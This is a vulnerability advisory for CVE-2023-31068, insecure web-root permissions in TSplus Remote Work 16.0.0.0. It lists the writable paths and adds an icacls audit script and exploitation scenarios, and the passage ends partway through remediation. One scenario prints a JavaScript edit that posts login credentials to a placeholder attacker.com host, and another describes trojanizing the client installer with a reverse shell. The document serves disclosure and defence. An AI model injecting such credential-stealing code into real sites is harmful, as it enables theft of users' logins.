TSplus 16.0.0.0 - Remote Work Insecure Files and Folders
# Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions
# Date: 2023-08-09
# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
# Vendor Homepage: https://tsplus.net/
# Version: Up to 16.0.0.0
# Tested on: Windows
# CVE : CVE-2023-31068
With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single
sign-on web portal and remote desktop gateway that enables users to
remotely access the console session of their office PC.
The solution ships with an embedded web server so that remote users can connect easily.
However, the installer sets insecure file and folder permissions (Everyone: full control) on the web root. Any local user can therefore alter content the server delivers to remote clients (e.g. edit the HTML pages or JavaScript) or replace legitimate files (e.g. Setup-RemoteWork-Client.exe) in order to compromise the machines of users who download them or to gain elevated privileges on the server.
This is the list of insecure files and folders with their respective
permissions:
Permission: Everyone:(OI)(CI)(F)
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\prints
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads\shared
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\locales
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\des
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\topmenu
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key\parts
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\cp
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\srv
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images\bramus
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var\log
-------------------------------------------------------------------------------------------
Permission: Everyone:(F)
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\robots.txt
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\hb.exe.config
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp\index.html
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\common.js
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\lang.js
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\Setup-RemoteWork-Client.exe
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\jwwebsockify.jar
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\web.jar
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitlist.html
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitupload.html
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\index.html
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\index.html
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img\port.bin
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\jws.js
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\sha256.js
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype\prototype.js
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js\jquery.min.js

TSplus 16.0.0.0 Vulnerability: Insecure File and Folder Permissions Exploited via Remote Work Portal
Carlo Di Dato (Deloitte Risk Advisory Italia) reported CVE-2023-31068 in TSplus Remote Work 16.0.0.0: the web root of the product's embedded web server is installed with permissions that give Everyone full control. Any low-privileged account on the server can therefore modify the HTML, JavaScript, configuration files and client installer that the server hands to remote users, which can lead to credential theft, compromise of client machines and privilege escalation on the server.
Understanding the Attack Surface
TSplus is a widely used remote access solution that enables employees to securely connect to their office desktops through a single sign-on web portal. It embeds a lightweight web server to deliver client-side applications, including HTML5-based interfaces, Java applets, and downloadable executables like Setup-RemoteWork-Client.exe.
During installation the software sets default permissions on these directories that grant Everyone full control: (F) with the Object Inherit (OI) and Container Inherit (CI) flags, so the grant flows down to every file and subfolder created beneath them, and several individual files carry an explicit Everyone:(F) entry of their own. Everyone is the Windows group that covers every local and domain account that can log on, including Guest; it does not cover anonymous network access unless the "Let Everyone permissions apply to anonymous users" policy has been enabled. In practice this means any account able to write to the server's file system, not only administrators, can read, write, replace or delete anything under the web root.
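The check an administrator would run is icacls over the web root and a scan of its output for broad principals with write rights. The following is an added example, not code from the advisory or from TSplus: it parses icacls output (the sample below is constructed, not captured from a real host, but reproduces the Everyone:(OI)(CI)(F) and Everyone:(F) entries the advisory lists), flags the entries that give a low-privileged principal write access, and emits the icacls command that removes each explicit grant. The principal and rights tables, and the assumption that continuation lines are indented, are the author's, not the page's.

```python
"""Audit icacls output for world-writable entries under a web root and emit
the icacls commands that remove the offending grants."""
import re
from dataclasses import dataclass
from typing import List

# Constructed sample of `icacls "<root>" /t` output (not captured from a real
# TSplus host). Entry 1 reproduces the Everyone:(OI)(CI)(F) folder ACE and
# entry 2 the Everyone:(F) file ACE reported in the advisory; entry 3 is a
# sane baseline (Users read/execute only) for comparison.
SAMPLE_ICACLS_OUTPUT = r"""C:\Program Files (x86)\TSplus-RemoteWork\Clients\www Everyone:(OI)(CI)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                     BUILTIN\Administrators:(I)(OI)(CI)(F)
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\Setup-RemoteWork-Client.exe Everyone:(F)
                                                     BUILTIN\Users:(I)(RX)
C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js\jquery.min.js BUILTIN\Users:(I)(RX)
                                                     BUILTIN\Administrators:(I)(F)

Successfully processed 3 files; Failed processing 0 files
"""

# Principals that stand for "any account on the box"; write access for them on
# content the web server serves, or on the client installer, is the finding.
BROAD_PRINCIPALS = {"everyone", "builtin\\users", "users",
                    "nt authority\\authenticated users", "authenticated users",
                    "nt authority\\interactive"}
# icacls simple rights (F, M, W, D) and specific rights (WD write data, AD append,
# WA/WEA write attributes, DC delete child, DE delete, WDAC write DACL, WO write
# owner, GA/GW generic all/write) that allow changing a file or its ACL.
WRITE_RIGHTS = {"F", "M", "W", "D", "GA", "GW", "WD", "AD", "WA", "WEA",
                "DC", "DE", "WDAC", "WO"}

# An ACE is "<principal>:(flag)(flag)...". The path on a first line may contain
# spaces ("Program Files (x86)"), so the path is matched lazily and the principal
# is restricted to forms icacls prints; domain accounts with spaces in the name
# are not handled by this simplified pattern.
_PRINCIPAL = r"(?:NT AUTHORITY\\[^:()]+|CREATOR OWNER|[^ :()]+)"
_ACE = r"(?P<principal>" + _PRINCIPAL + r"):(?P<flags>(?:\([A-Za-z,]*\))+)"
FIRST_LINE_RE = re.compile(r"^(?P<path>\S.*?) " + _ACE + r"$")
CONT_LINE_RE = re.compile(r"^\s+" + _ACE + r"$")


@dataclass
class Finding:
    path: str
    principal: str
    rights: str        # raw icacls flag string, e.g. "(OI)(CI)(F)"
    inherited: bool    # True when the ACE carries the (I) flag


def _tokens(flags: str) -> List[str]:
    """Split "(OI)(CI)(RX,WD)" into ["OI", "CI", "RX", "WD"]."""
    out: List[str] = []
    for group in re.findall(r"\(([^)]*)\)", flags):
        out.extend(t.strip().upper() for t in group.split(",") if t.strip())
    return out


def grants_write(flags: str) -> bool:
    return any(t in WRITE_RIGHTS for t in _tokens(flags))


def is_inherited(flags: str) -> bool:
    return "I" in _tokens(flags)


def parse_icacls(text: str) -> List[Finding]:
    """Return every ACE that gives a broad principal write access."""
    findings: List[Finding] = []
    path = None
    for line in text.splitlines():
        m = FIRST_LINE_RE.match(line)
        if m:
            path = m.group("path")
        else:
            m = CONT_LINE_RE.match(line)
            if not m or path is None:
                continue  # blank line or the trailing summary line
        principal, flags = m.group("principal"), m.group("flags")
        if principal.lstrip("*").lower() in BROAD_PRINCIPALS and grants_write(flags):
            findings.append(Finding(path, principal, flags, is_inherited(flags)))
    return findings


def remediation_commands(findings: List[Finding]) -> List[str]:
    """One icacls command per explicit finding. An inherited ACE cannot be
    removed on the child; it must be fixed on the parent that grants it."""
    cmds: List[str] = []
    for f in findings:
        if f.inherited:
            cmds.append(f"REM {f.path}: {f.principal} {f.rights} is inherited; fix the parent folder")
        else:
            cmds.append(f'icacls "{f.path}" /remove:g "{f.principal}"')
    return cmds


if __name__ == "__main__":
    found = parse_icacls(SAMPLE_ICACLS_OUTPUT)
    for f in found:
        kind = "inherited" if f.inherited else "explicit"
        print(f"{kind:9} {f.principal} {f.rights}  {f.path}")
    print("\n".join(remediation_commands(found)))
```

Feed it the real output of `icacls "C:\Program Files (x86)\TSplus-RemoteWork\Clients\www" /t` and review the generated commands before running them: the service identity of the embedded web server may legitimately need write access to folders such as var\log, prints or downloads\shared, and that access should be granted to that identity explicitly rather than left open to Everyone.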
Exposed File and Folder Path List
The affected directories (Everyone:(OI)(CI)(F)) and files (Everyone:(F)) are the ones enumerated in the advisory above: every folder from the www root down to software\java\third\js\prototype and var\log, and files including the client installer, the two .config files in cgi-bin and every script the portal serves.
Exploitation Scenarios: Real-World Use Cases
Here are three plausible attack vectors based on the vulnerability:
1. Malicious JavaScript Injection via the Web Client
The software\js and software\html5 folders are world-writable, and download\common.js, download\lang.js and software\js\jquery.min.js are listed with Everyone:(F), so a local user can edit or append to a script that the portal serves to every browser loading the login page. Taking a hypothetical validateLogin function as the target (the advisory does not name the login script), the change is as small as:
// Original:
function validateLogin(username, password) {
    if (username && password) {
        return true;
    }
    return false;
}
// Malicious (attacker.com is a placeholder for the attacker's collector):
function validateLogin(username, password) {
    if (username && password) {
        // Copy the credentials to the attacker before the real login proceeds;
        // keepalive lets the request survive the page navigation that follows.
        fetch('https://attacker.com/log', {
            method: 'POST',
            mode: 'no-cors',
            keepalive: true,
            body: JSON.stringify({user: username, pass: password})
        });
        return true;
    }
    return false;
}
2. Trojanized Client Installer
Setup-RemoteWork-Client.exe is served from the download folder; both download and downloads are world-writable and the file itself is Everyone:(F). A local user can overwrite it with a build that installs the legitimate client and also a backdoor, for example a reverse shell registered to run at logon.
Explanation: users fetch the installer from their own organisation's portal and treat it as trusted, so the replacement runs with whatever privileges the user grants the installation, giving the attacker code execution on every client machine that downloads it. Checking the publisher signature before running the installer would expose the swap only if the original is signed, which the advisory does not state.
3. Server-Side Tampering in cgi-bin
The cgi-bin folder is itself world-writable and holds two .NET application configuration files, hb.exe.config and SessionPrelaunch.Common.dll.config, each with Everyone:(F). TSplus runs on Windows, so a Unix shell CGI script is not the relevant vector. What a local user can do is edit the configuration that the server-side binaries load at start-up (application settings, assembly binding redirects and probing paths, which can steer a binary to load an attacker-supplied assembly), or drop files into cgi-bin and cgi-bin\remoteapp, whose index.html is also writable. Whether the embedded server executes an attacker-supplied file placed in cgi-bin is not established by the advisory and should be verified on a test installation before it is claimed.
Explanation: a .config file that redirects a server-side binary to a different assembly or endpoint is acted on with the privileges of the process that loads it, which is the route to privilege escalation on the server that the advisory describes.
Impact and Risk Assessment
| Severity | CVSS Score | Exploitability | Impact |
|---|---|---|---|
| High | 8.8 (CVSS v3.1) | Requires write access to the server's file system (any local account); tampered content is then delivered remotely through the portal | High (credential theft, compromise of client machines, privilege escalation on the server) |
A score of 8.8 falls in the CVSS v3.1 High band (Critical starts at 9.0). The weakness itself is local: the attacker needs an account or foothold that can write under the web root, not merely network access to the portal. What makes it severe is the delivery path: anything changed under the web root is served to every remote user of the gateway, so a single low-privileged foothold on the server scales to the whole user base.
Remediation and Mitigation Strategies
Organizations using TSplus 16.0.0.0 must take immediate action to secure the environment